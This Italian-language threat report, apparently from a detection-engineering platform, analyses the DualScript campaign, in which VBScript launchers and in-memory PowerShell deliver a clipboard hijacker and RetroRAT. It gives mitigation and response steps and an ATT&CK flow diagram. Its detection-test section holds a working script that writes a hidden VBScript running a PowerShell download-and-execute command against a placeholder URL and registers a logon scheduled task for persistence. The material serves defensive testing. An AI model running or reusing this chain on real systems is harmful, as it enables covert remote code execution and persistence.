Segui 
Detection stack
- AIDR
- Alert
- ETL
- Query
Riepilogo
Il report delinea l’Operazione DualScript, una campagna malware a più fasi che si basa su attività programmate per la persistenza, launcher VBScript e loader PowerShell per distribuire sia un hijacker del clipboard che il trojan di accesso remoto RetroRAT. Gli aggressori memorizzano PowerShell dannoso su server esterni ed eseguono completamente in memoria per ridurre le opportunità di rilevamento. RetroRAT registra le sequenze dei tasti, monitora le finestre attive per parole chiave legate alle finanze e invia i dati rubati attraverso un canale TCP C2 personalizzato. La campagna è mirata ad attività di criptovaluta e obiettivi bancari statunitensi.
Indagine
Gli analisti hanno scoperto attività programmate configurate per avviare file VBScript da percorsi scrivibili dall’utente, che esegue quindi PowerShell nascosto con il bypass delle politiche di esecuzione abilitato. Sono stati identificati due catene di distribuzione parallele: una recuperava uno script Wallet.txt per dirottare il contenuto del clipboard di criptovaluta, mentre l’altra caricava RetroRAT direttamente in memoria. L’analisi statica ha anche rivelato logiche anti-analisi, creazione di mutex, keylogging multi-thread e una stringa di handshake C2 codificata.
Mitigazione
I difensori dovrebbero monitorare attività programmate sospette che invocano VBScript o PowerShell con finestre nascoste e argomenti di bypass. Il rilevamento endpoint dovrebbe concentrarsi sull’esecuzione di PowerShell in memoria, comportamento insolito di monitoraggio del clipboard e creazione di mutex sconosciuti. Le organizzazioni dovrebbero anche bloccare il traffico in uscita verso i domini malevoli e applicare rigidi controlli di esecuzione a PowerShell e VBScript.
Risposta
Se viene rilevata questa attività, isolare l’host interessato, disabilitare le attività programmate malevole e rimuovere gli artefatti VBScript o PowerShell persistenti. Eseguire una scansione forense completa per il payload RetroRAT, i dati di capture della sequenza di tasti e il traffico C2 correlato. Resettare le informazioni del portafoglio di criptovaluta esposto e cambiare le credenziali bancarie. Ripristinare i sistemi colpiti da backup puliti e bloccare i domini e gli indirizzi IP identificati al livello di rete.
"graph TB %% Class definitions classDef technique fill:#d1e8ff classDef file fill:#ffe6cc classDef malware fill:#ffcccc classDef process fill:#e2ffd6 %% Nodes u2013 Techniques tech_persistence["<b>Tecnica</b> – <b>T1053 Attività Programmata/Compito</b><br/><b>Descrizione</b>: Crea un’attività programmata Windows che esegue un launcher VBScript in modalità nascosta per la persistenza."] class tech_persistence technique tech_execution["<b>Tecnica</b> – <b>T1059.001 PowerShell</b><br/><b>Descrizione</b>: Esegue codice PowerShell tramite bypass delle politiche di esecuzione e lo esegue direttamente in memoria."] class tech_execution technique tech_defense["<b>Tecnica</b> – <b>T1497.002 Evasione Sandbox Virtualizzazione</b><br/><b>Descrizione</b>: Verifica i nomi utente della sandbox e gli artefatti VM; si interrompe se viene rilevato tale ambiente."] class tech_defense technique tech_download["<b>Tecnica</b> – <b>T1102 Servizio Web</b><br/><b>Descrizione</b>: Recupera un payload remoto (Wallet.txt) su HTTPS e lo converte in un ScriptBlock per l’esecuzione in memoria."] class tech_download technique tech_clipboard["<b>Tecnica</b> – <b>T1115 Dati del Clipboard</b> e <b>T1204.004 Copia e Incolla Maliziosa</b><br/><b>Descrizione</b>: Monitora il clipboard di sistema e sostituisce gli indirizzi di criptovaluta legittimi con portafogli controllati dall’attaccante."] class tech_clipboard technique tech_keylog["<b>Tecnica</b> – <b>T1056.001 Keylogging</b><br/><b>Descrizione</b>: Installa un hook di tastiera a basso livello per catturare le sequenze di tasti durante le sessioni finanziarie."] class tech_keylog technique tech_screen["<b>Tecnica</b> – <b>T1113 Cattura Schermo</b><br/><b>Descrizione</b>: Registra screenshot o trasmette il desktop per il monitoraggio visivo dell’attività della vittima."] class tech_screen technique tech_c2["<b>Tecnica</b> – <b>T1041 Esfiltrazione su Canale C2</b><br/><b>Descrizione</b>: Invia sequenze di tasti raccolti, dati del clipboard e log a un server C2 codificato tramite un client TCP."] class tech_c2 technique tech_process["<b>Tecnica</b> – <b>T1543 Crea o Modifica Processo di Sistema</b><br/><b>Descrizione</b>: L’attività programmata genera un nuovo processo per il payload PowerShell e crea successivamente thread aggiuntivi per funzioni parallele."] class tech_process technique tech_rdp["<b>Tecnica</b> – <b>T1219.002 Software di Desktop Remoto</b><br/><b>Descrizione</b>: Consente all’attaccante di visualizzare o controllare il desktop della vittima tramite il componente RetroRAT."] class tech_rdp technique tech_inputinj["<b>Tecnica</b> – <b>T1674 Iniezione di Input</b><br/><b>Descrizione</b>: Inietta stringhe di portafoglio controllate dall’attaccante nel clipboard prima che la vittima incolli il contenuto."] class tech_inputinj technique %% Nodes u2013 Artifacts file_vbscript["<b>File</b> – <b>Nome</b>: ppamproServiceZuneWAL.vbs / PiceVid.vbs<br/><b>Scopo</b>: Avvia il payload PowerShell in modalità nascosta."] class file_vbscript file malware_retro["<b>Malware</b> – <b>Nome</b>: RetroRAT<br/><b>Funzione</b>: Fornisce capacità di desktop remoto e esecuzione di comandi."] class malware_retro malware %% Connections u2013 Flow tech_persistence –>|create| file_vbscript file_vbscript –>|activate| tech_execution tech_execution –>|utilizza| tech_download tech_download –>|consegna il payload a| tech_process tech_process –>|genera| tech_keylog tech_process –>|genera| tech_screen tech_process –>|genera| tech_clipboard tech_clipboard –>|attiva| tech_inputinj tech_keylog –>|esfiltra tramite| tech_c2 tech_screen –>|esfiltra tramite| tech_c2 tech_clipboard –>|esfiltra tramite| tech_c2 tech_process –>|avvia| tech_rdp tech_rdp –>|comunica con| tech_c2 tech_rdp –>|esegue| malware_retro tech_defense –>|controlla prima| file_vbscript "
Flusso di Attacco
Rilevamenti
Indicatori di Compromissione (HashMd5) per rilevare: Operazione DualScript – Una Campagna Malware PowerShell a Più Fasi che Mira all’Attività Finanziaria e di Criptovaluta
Visualizza
Connessioni in Uscita al Server Remoto per il Recupero dei Comandi [Connessione di Rete Windows]
Visualizza
Operazione DualScript – Persistenza mediante Attività Programmata con VBScript e PowerShell [Attività Programmata Windows]
Visualizza
Operazione DualScript Download di Contenuti Remoti con PowerShell e Hijacking del Clipboard [Powershell di Windows]
Visualizza
Esecuzione della Simulazione
Prerequisito: il Controllo Pre-volo di Telemetria e Linea di Base deve essere stato superato.
Motivazione: Questa sezione delinea l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e il racconto DEVONO riflettere direttamente i TTP identificati e mirare a generare l’esatta telemetria prevista dalla logica di rilevamento.
-
Narrazione dell’Attacco e Comandi:
L’attaccante posiziona inizialmente uno script VBScript (dual.vbs) nella directory del profilo dell’utente. Lo scopo dello script è avviare PowerShell con i flag-WindowStyle Hiddenand-ExecutionPolicy Bypass, quindi scaricare ed eseguire un payload remoto (simulato con un sempliceWrite-Host). Per ottenere la persistenza, l’attaccante registra un’attività programmata (DualScriptPersist) che esegue il VBScript al logon. Ogni passaggio produce le due voci di EventID 4104 correlate che la regola cerca. -
Script di Test di Regressione:
# ------------------------------------------------- # Simulazione di Attacco DualScript – PowerShell # ------------------------------------------------- # 1️⃣ Creare un VBScript malevolo in un percorso scrivibile dall'utente $vbsPath = "$env:USERPROFILEdual.vbs" $payloadUrl = "http://example.com/payload.ps1" # URL di placeholder $vbsContent = @" WScript.Sleep 500 Dim sh Set sh = CreateObject("WScript.Shell") sh.Run "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command `"IEX (New-Object Net.WebClient).DownloadString('$payloadUrl')`"" "@ $vbsContent | Set-Content -Path $vbsPath -Encoding ASCII # 2️⃣ Registrare un'attività programmata che esegua il VBScript ad ogni logon utente $taskName = "DualScriptPersist" $taskAction = "`"$vbsPath`"" schtasks.exe /Create ` /SC ONLOGON ` /RL HIGHEST ` /TN $taskName ` /TR $taskAction ` /F # 3️⃣ Forzare l'avvio dell'attività immediatamente (attiva rilevamento) schtasks.exe /Run /TN $taskName Write-Host "`n[+] Simulazione DualScript eseguita. Controlla il tuo SIEM per gli allarmi." # ------------------------------------------------- -
Comandi di Pulizia:
# ------------------------------------------------- # Pulizia della Simulazione DualScript # ------------------------------------------------- $taskName = "DualScriptPersist" $vbsPath = "$env:USERPROFILEdual.vbs" # Eliminare l'attività programmata schtasks.exe /Delete /TN $taskName /F # Rimuovere il file VBScript Remove-Item -Path $vbsPath -Force -ErrorAction SilentlyContinue Write-Host "`n[+] Pulizia completata." # -------------------------------------------------